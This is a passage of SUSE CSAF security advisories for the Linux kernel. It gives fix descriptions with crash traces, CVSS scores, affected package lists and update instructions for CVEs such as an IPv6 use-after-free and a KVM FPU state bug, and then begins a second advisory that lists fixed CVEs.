"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/fpu: Clear XSTATE_BV[i] in guest XSAVE state whenever XFD[i]=1\n\nWhen loading guest XSAVE state via KVM_SET_XSAVE, and when updating XFD in\nresponse to a guest WRMSR, clear XFD-disabled features in the saved (or to\nbe restored) XSTATE_BV to ensure KVM doesn\u0027t attempt to load state for\nfeatures that are disabled via the guest\u0027s XFD. Because the kernel\nexecutes XRSTOR with the guest\u0027s XFD, saving XSTATE_BV[i]=1 with XFD[i]=1\nwill cause XRSTOR to #NM and panic the kernel.\n\nE.g. if fpu_update_guest_xfd() sets XFD without clearing XSTATE_BV:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#29: amx_test/848\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 29 UID: 1000 PID: 848 Comm: amx_test Not tainted 6.19.0-rc2-ffa07f7fd437-x86_amx_nm_xfd_non_init-vm #171 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n switch_fpu_return+0x4a/0xb0\n kvm_arch_vcpu_ioctl_run+0x1245/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThis can happen if the guest executes WRMSR(MSR_IA32_XFD) to set XFD[18] = 1,\nand a host IRQ triggers kernel_fpu_begin() prior to the vmexit handler\u0027s\ncall to fpu_update_guest_xfd().\n\nand if userspace stuffs XSTATE_BV[i]=1 via KVM_SET_XSAVE:\n\n ------------[ cut here ]------------\n WARNING: arch/x86/kernel/traps.c:1524 at exc_device_not_available+0x101/0x110, CPU#14: amx_test/867\n Modules linked in: kvm_intel kvm irqbypass\n CPU: 14 UID: 1000 PID: 867 Comm: amx_test Not tainted 6.19.0-rc2-2dace9faccd6-x86_amx_nm_xfd_non_init-vm #168 NONE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 0.0.0 02/06/2015\n RIP: 0010:exc_device_not_available+0x101/0x110\n Call Trace:\n \u003cTASK\u003e\n asm_exc_device_not_available+0x1a/0x20\n RIP: 0010:restore_fpregs_from_fpstate+0x36/0x90\n fpu_swap_kvm_fpstate+0x6b/0x120\n kvm_load_guest_fpu+0x30/0x80 [kvm]\n kvm_arch_vcpu_ioctl_run+0x85/0x1e40 [kvm]\n kvm_vcpu_ioctl+0x2c3/0x8f0 [kvm]\n __x64_sys_ioctl+0x8f/0xd0\n do_syscall_64+0x62/0x940\n entry_SYSCALL_64_after_hwframe+0x4b/0x53\n \u003c/TASK\u003e\n ---[ end trace 0000000000000000 ]---\n\nThe new behavior is consistent with the AMX architecture. Per Intel\u0027s SDM,\nXSAVE saves XSTATE_BV as \u00270\u0027 for components that are disabled via XFD\n(and non-compacted XSAVE saves the initial configuration of the state\ncomponent):\n\n If XSAVE, XSAVEC, XSAVEOPT, or XSAVES is saving the state component i,\n the instruction does not generate #NM when XCR0[i] = IA32_XFD[i] = 1;\n instead, it operates as if XINUSE[i] = 0 (and the state component was\n in its initial state): it saves bit i of XSTATE_BV field of the XSAVE\n header as 0; in addition, XSAVE saves the initial configuration of the\n state component (the other instructions do not save state component i).\n\nAlternatively, KVM could always do XRSTOR with XFD=0, e.g. by using\na constant XFD based on the set of enabled features when XSAVEing for\na struct fpu_guest. However, having XSTATE_BV[i]=1 for XFD-disabled\nfeatures can only happen in the above interrupt case, or in similar\nscenarios involving preemption on preemptible kernels, because\nfpu_swap_kvm_fpstate()\u0027s call to save_fpregs_to_fpstate() saves the\noutgoing FPU state with the current XFD; and that is (on all but the\nfirst WRMSR to XFD) the guest XFD.\n\nTherefore, XFD can only go out of sync with XSTATE_BV in the above\ninterrupt case, or in similar scenarios involving preemption on\npreemptible kernels, and it we can consider it (de facto) part of KVM\nABI that KVM_GET_XSAVE returns XSTATE_BV[i]=0 for XFD-disabled features.\n\n[Move clea\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23005",
"url": "https://www.suse.com/security/cve/CVE-2026-23005"
},
{
"category": "external",
"summary": "SUSE Bug 1257245 for CVE-2026-23005",
"url": "https://bugzilla.suse.com/1257245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-23005"
},
{
"cve": "CVE-2026-23006",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23006"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: tlv320adcx140: fix null pointer\n\nThe \"snd_soc_component\" in \"adcx140_priv\" was only used once but never\nset. It was only used for reaching \"dev\" which is already present in\n\"adcx140_priv\".",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23006",
"url": "https://www.suse.com/security/cve/CVE-2026-23006"
},
{
"category": "external",
"summary": "SUSE Bug 1257208 for CVE-2026-23006",
"url": "https://bugzilla.suse.com/1257208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-23006"
},
{
"cve": "CVE-2026-23010",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23010"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: Fix use-after-free in inet6_addr_del().\n\nsyzbot reported use-after-free of inet6_ifaddr in\ninet6_addr_del(). [0]\n\nThe cited commit accidentally moved ipv6_del_addr() for\nmngtmpaddr before reading its ifp-\u003eflags for temporary\naddresses in inet6_addr_del().\n\nLet\u0027s move ipv6_del_addr() down to fix the UAF.\n\n[0]:\nBUG: KASAN: slab-use-after-free in inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\nRead of size 4 at addr ffff88807b89c86c by task syz.3.1618/9593\n\nCPU: 0 UID: 0 PID: 9593 Comm: syz.3.1618 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:94 [inline]\n dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xcd/0x630 mm/kasan/report.c:482\n kasan_report+0xe0/0x110 mm/kasan/report.c:595\n inet6_addr_del.constprop.0+0x67a/0x6b0 net/ipv6/addrconf.c:3117\n addrconf_del_ifaddr+0x11e/0x190 net/ipv6/addrconf.c:3181\n inet6_ioctl+0x1e5/0x2b0 net/ipv6/af_inet6.c:582\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f164cf8f749\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48\nRSP: 002b:00007f164de64038 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\nRAX: ffffffffffffffda RBX: 00007f164d1e5fa0 RCX: 00007f164cf8f749\nRDX: 0000200000000000 RSI: 0000000000008936 RDI: 0000000000000003\nRBP: 00007f164d013f91 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007f164d1e6038 R14: 00007f164d1e5fa0 R15: 00007ffde15c8288\n \u003c/TASK\u003e\n\nAllocated by task 9593:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:397 [inline]\n __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:414\n kmalloc_noprof include/linux/slab.h:957 [inline]\n kzalloc_noprof include/linux/slab.h:1094 [inline]\n ipv6_add_addr+0x4e3/0x2010 net/ipv6/addrconf.c:1120\n inet6_addr_add+0x256/0x9b0 net/ipv6/addrconf.c:3050\n addrconf_add_ifaddr+0x1fc/0x450 net/ipv6/addrconf.c:3160\n inet6_ioctl+0x103/0x2b0 net/ipv6/af_inet6.c:580\n sock_do_ioctl+0x118/0x280 net/socket.c:1254\n sock_ioctl+0x227/0x6b0 net/socket.c:1375\n vfs_ioctl fs/ioctl.c:51 [inline]\n __do_sys_ioctl fs/ioctl.c:597 [inline]\n __se_sys_ioctl fs/ioctl.c:583 [inline]\n __x64_sys_ioctl+0x18e/0x210 fs/ioctl.c:583\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xf80 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nFreed by task 6099:\n kasan_save_stack+0x33/0x60 mm/kasan/common.c:56\n kasan_save_track+0x14/0x30 mm/kasan/common.c:77\n kasan_save_free_info+0x3b/0x60 mm/kasan/generic.c:584\n poison_slab_object mm/kasan/common.c:252 [inline]\n __kasan_slab_free+0x5f/0x80 mm/kasan/common.c:284\n kasan_slab_free include/linux/kasan.h:234 [inline]\n slab_free_hook mm/slub.c:2540 [inline]\n slab_free_freelist_hook mm/slub.c:2569 [inline]\n slab_free_bulk mm/slub.c:6696 [inline]\n kmem_cache_free_bulk mm/slub.c:7383 [inline]\n kmem_cache_free_bulk+0x2bf/0x680 mm/slub.c:7362\n kfree_bulk include/linux/slab.h:830 [inline]\n kvfree_rcu_bulk+0x1b7/0x1e0 mm/slab_common.c:1523\n kvfree_rcu_drain_ready mm/slab_common.c:1728 [inline]\n kfree_rcu_monitor+0x1d0/0x2f0 mm/slab_common.c:1801\n process_one_work+0x9ba/0x1b20 kernel/workqueue.c:3257\n process_scheduled_works kernel/workqu\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23010",
"url": "https://www.suse.com/security/cve/CVE-2026-23010"
},
{
"category": "external",
"summary": "SUSE Bug 1257332 for CVE-2026-23010",
"url": "https://bugzilla.suse.com/1257332"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-23010"
},
{
"cve": "CVE-2026-23011",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23011"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv4: ip_gre: make ipgre_header() robust\n\nAnalog to commit db5b4e39c4e6 (\"ip6_gre: make ip6gre_header() robust\")\n\nOver the years, syzbot found many ways to crash the kernel\nin ipgre_header() [1].\n\nThis involves team or bonding drivers ability to dynamically\nchange their dev-\u003eneeded_headroom and/or dev-\u003ehard_header_len\n\nIn this particular crash mld_newpack() allocated an skb\nwith a too small reserve/headroom, and by the time mld_sendpack()\nwas called, syzbot managed to attach an ipgre device.\n\n[1]\nskbuff: skb_under_panic: text:ffffffff89ea3cb7 len:2030915468 put:2030915372 head:ffff888058b43000 data:ffff887fdfa6e194 tail:0x120 end:0x6c0 dev:team0\n kernel BUG at net/core/skbuff.c:213 !\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 1 UID: 0 PID: 1322 Comm: kworker/1:9 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/25/2025\nWorkqueue: mld mld_ifc_work\n RIP: 0010:skb_panic+0x157/0x160 net/core/skbuff.c:213\nCall Trace:\n \u003cTASK\u003e\n skb_under_panic net/core/skbuff.c:223 [inline]\n skb_push+0xc3/0xe0 net/core/skbuff.c:2641\n ipgre_header+0x67/0x290 net/ipv4/ip_gre.c:897\n dev_hard_header include/linux/netdevice.h:3436 [inline]\n neigh_connected_output+0x286/0x460 net/core/neighbour.c:1618\n NF_HOOK_COND include/linux/netfilter.h:307 [inline]\n ip6_output+0x340/0x550 net/ipv6/ip6_output.c:247\n NF_HOOK+0x9e/0x380 include/linux/netfilter.h:318\n mld_sendpack+0x8d4/0xe60 net/ipv6/mcast.c:1855\n mld_send_cr net/ipv6/mcast.c:2154 [inline]\n mld_ifc_work+0x83e/0xd60 net/ipv6/mcast.c:2693\n process_one_work kernel/workqueue.c:3257 [inline]\n process_scheduled_works+0xad1/0x1770 kernel/workqueue.c:3340\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3421\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x510/0xa50 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23011",
"url": "https://www.suse.com/security/cve/CVE-2026-23011"
},
{
"category": "external",
"summary": "SUSE Bug 1257207 for CVE-2026-23011",
"url": "https://bugzilla.suse.com/1257207"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2026-23011"
}
]
}
SUSE-SU-2026:20615-1
Vulnerability from csaf_suse - Published: 2026-02-27 11:32 - Updated: 2026-02-27 11:32Summary
Security update for the Linux Kernel
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel
Description of the patch:
The SUSE Linux Enterprise 16.0 and SL MIxro 6.2 kernel was updated to fix various security issues
The following security issues were fixed:
- CVE-2025-40147: blk-throttle: fix access race during throttle policy activation (bsc#1253344).
- CVE-2025-40257: mptcp: fix a race in mptcp_pm_del_add_timer() (bsc#1254842).
- CVE-2025-40259: scsi: sg: Do not sleep in atomic context (bsc#1254845).
- CVE-2025-40261: nvme: nvme-fc: Ensure ->ioerr_work is cancelled in nvme_fc_delete_ctrl() (bsc#1254839).
- CVE-2025-40363: net: ipv6: fix field-spanning memcpy warning in AH output (bsc#1255102).
- CVE-2025-68174: amd/amdkfd: enhance kfd process check in switch partition (bsc#1255327).
- CVE-2025-68178: blk-cgroup: fix possible deadlock while configuring policy (bsc#1255266).
- CVE-2025-68188: tcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check() (bsc#1255269).
- CVE-2025-68200: bpf: Add bpf_prog_run_data_pointers() (bsc#1255241).
- CVE-2025-68211: ksm: use range-walk function to jump over holes in scan_get_next_rmap_item (bsc#1255319).
- CVE-2025-68218: nvme-multipath: fix lockdep WARN due to partition scan work (bsc#1255245).
- CVE-2025-68227: mptcp: Fix proto fallback detection with BPF (bsc#1255216).
- CVE-2025-68241: ipv4: route: Prevent rt_bind_exception() from rebinding stale fnhe (bsc#1255157).
- CVE-2025-68245: net: netpoll: fix incorrect refcount handling causing incorrect cleanup (bsc#1255268).
- CVE-2025-68261: ext4: add i_data_sem protection in ext4_destroy_inline_data_nolock() (bsc#1255164).
- CVE-2025-68296: drm, fbcon, vga_switcheroo: Avoid race condition in fbcon setup (bsc#1255128).
- CVE-2025-68297: ceph: fix crash in process_v2_sparse_read() for encrypted directories (bsc#1255403).
- CVE-2025-68320: lan966x: Fix sleeping in atomic context (bsc#1255172).
- CVE-2025-68325: net/sched: sch_cake: Fix incorrect qlen reduction in cake_drop (bsc#1255417).
- CVE-2025-68337: jbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted (bsc#1255482).
- CVE-2025-68341: veth: reduce XDP no_direct return section to fix race (bsc#1255506).
- CVE-2025-68348: block: fix memory leak in __blkdev_issue_zero_pages (bsc#1255694).
- CVE-2025-68349: NFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid (bsc#1255544).
- CVE-2025-68356: gfs2: Prevent recursive memory reclaim (bsc#1255593).
- CVE-2025-68359: btrfs: fix double free of qgroup record after failure to add delayed ref head (bsc#1255542).
- CVE-2025-68360: wifi: mt76: wed: use proper wed reference in mt76 wed driver callabacks (bsc#1255536).
- CVE-2025-68361: erofs: limit the level of fs stacking for file-backed mounts (bsc#1255526).
- CVE-2025-68366: nbd: defer config unlock in nbd_genl_connect (bsc#1255622).
- CVE-2025-68367: macintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse (bsc#1255547).
- CVE-2025-68368: md: init bioset in mddev_init (bsc#1255527).
- CVE-2025-68372: nbd: defer config put in recv_work (bsc#1255537).
- CVE-2025-68374: md: fix rcu protection in md_wakeup_thread (bsc#1255530).
- CVE-2025-68376: coresight: ETR: Fix ETR buffer use-after-free issue (bsc#1255529).
